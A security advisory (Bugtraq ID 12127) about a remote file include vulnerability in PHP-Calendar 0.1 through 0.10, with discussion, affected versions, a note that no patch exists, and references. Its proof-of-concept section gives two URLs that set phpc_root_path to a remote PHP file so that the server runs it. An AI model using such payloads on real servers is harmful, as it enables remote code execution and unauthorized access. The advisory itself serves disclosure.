PHP-Calendar Remote File Include Vulnerability
BID:12127
Info
PHP-Calendar Remote File Include Vulnerability
| Bugtraq ID: | 12127 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 29 2004 12:00AM |
| Updated: | Dec 29 2004 12:00AM |
| Credit: | Discovery is credited to James Bercegay of the GulfTech Security Research Team. |
| Vulnerable: |
PHP-Calendar PHP-Calendar 0.10 PHP-Calendar PHP-Calendar 0.9.1 PHP-Calendar PHP-Calendar 0.9 PHP-Calendar PHP-Calendar 0.8 PHP-Calendar PHP-Calendar 0.7 PHP-Calendar PHP-Calendar 0.6 PHP-Calendar PHP-Calendar 0.5 PHP-Calendar PHP-Calendar 0.4 PHP-Calendar PHP-Calendar 0.3 PHP-Calendar PHP-Calendar 0.2 PHP-Calendar PHP-Calendar 0.1 |
| Not Vulnerable: | |
Discussion
PHP-Calendar Remote File Include Vulnerability
A remote file include vulnerability affects PHP-Calendar. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.
A remote file include vulnerability affects PHP-Calendar. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.
Exploit / POC
PHP-Calendar Remote File Include Vulnerability
No exploit is required to leverage this issue.
The following proof of concept examples are available:
http://www.example.com/includes/calendar.php?phpc_root_path=http://www.example.com/includes/ht
ml.php
http://www.example.com/includes/setup.php?phpc_root_path=http://www.example.com/includes/html.
php
No exploit is required to leverage this issue.
The following proof of concept examples are available:
http://www.example.com/includes/calendar.php?phpc_root_path=http://www.example.com/includes/ht
ml.php
http://www.example.com/includes/setup.php?phpc_root_path=http://www.example.com/includes/html.
php
Solution / Fix
PHP-Calendar Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHP-Calendar Remote File Include Vulnerability
References:
References:
- PHP-Calendar Homepage (PHP-Calendar)
- php-Calendar File Include Vulnerability [ Command Exec ] ("GulfTech Security"
)